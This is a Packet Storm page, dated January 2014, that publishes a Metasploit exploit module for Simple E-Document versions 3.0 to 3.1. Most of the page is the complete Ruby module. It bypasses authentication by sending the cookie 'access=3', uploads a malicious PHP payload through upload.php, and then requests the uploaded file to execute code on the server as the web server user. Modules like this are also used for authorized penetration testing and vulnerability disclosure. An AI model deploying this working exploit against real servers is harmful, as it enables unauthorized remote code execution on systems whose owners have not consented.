what you don't know can hurt you

Simple E-Document Arbitrary File Upload

Simple E-Document Arbitrary File Upload
Posted Jan 28, 2014
Authored by Brendan Coles, vinicius777 | Site metasploit.com

This Metasploit module exploits a file upload vulnerability found in Simple E-Document versions 3.0 to 3.1. Attackers can bypass authentication and abuse the upload feature in order to upload malicious PHP files which results in arbitrary remote code execution as the web server user. File uploads are disabled by default.

tags | exploit, remote, web, arbitrary, php, code execution, file upload
MD5 | 6673942972dbee1582ce76afa3bf104d

Simple E-Document Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Simple E-Document Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in Simple
E-Document versions 3.0 to 3.1. Attackers can bypass authentication and
abuse the upload feature in order to upload malicious PHP files which
results in arbitrary remote code execution as the web server user. File
uploads are disabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
# This EDB uses SQLI for auth bypass which isn't needed.
# Sending "Cookie: access=3" with all requests is all
# that's needed for auth bypass.
['EDB', '31142']
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# response body, so really it's unlimited
'Space' => 262144 # 256k
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on Simple E-Document versions 3.0 and 3.1
[ 'Generic (PHP Payload)', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 23 2014',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
], self.class)
end

#
# Checks if target allows file uploads
#
def check
res = send_request_raw({
'uri' => normalize_uri(target_uri.path, 'upload.php'),
'cookie' => 'access=3'
})

unless res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end

if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/
vprint_error("#{peer} - File uploads are disabled")
return Exploit::CheckCode::Safe
end

if res.body and res.body.to_s =~ /Upload File/
return Exploit::CheckCode::Appears
end

return Exploit::CheckCode::Safe
end

#
# Uploads our malicious file
#
def upload
@fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
php = "<?php #{payload.encoded} ?>"

data = Rex::MIME::Message.new
data.add_part('upload', nil, nil, 'form-data; name="op1"')
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')

print_status("#{peer} - Uploading malicious file...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => 'access=3',
'data' => post_data,
'vars_get' => {
'op' => 'newin'
}
})

fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res
fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/)

print_good("#{peer} - Payload uploaded successfully.")
register_files_for_cleanup(@fname)

if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/
@upload_path = normalize_uri(target_uri.path, "#{$1}")
print_good("#{peer} - Found upload path #{@upload_path}")
else
@upload_path = normalize_uri(target_uri.path, 'in')
print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'")
end
end

#
# Executes our uploaded malicious file
#
def exec
print_status("#{peer} - Executing #{@fname}...")
res = send_request_raw({
'uri' => normalize_uri(@upload_path, @fname),
'cookie' => 'access=3'
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
end
end

#
# Just upload and execute
#
def exploit
upload
exec
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close